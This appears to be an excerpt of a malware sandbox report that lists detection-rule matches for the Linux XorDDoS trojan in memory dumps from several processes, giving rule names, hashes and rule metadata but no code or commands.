Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
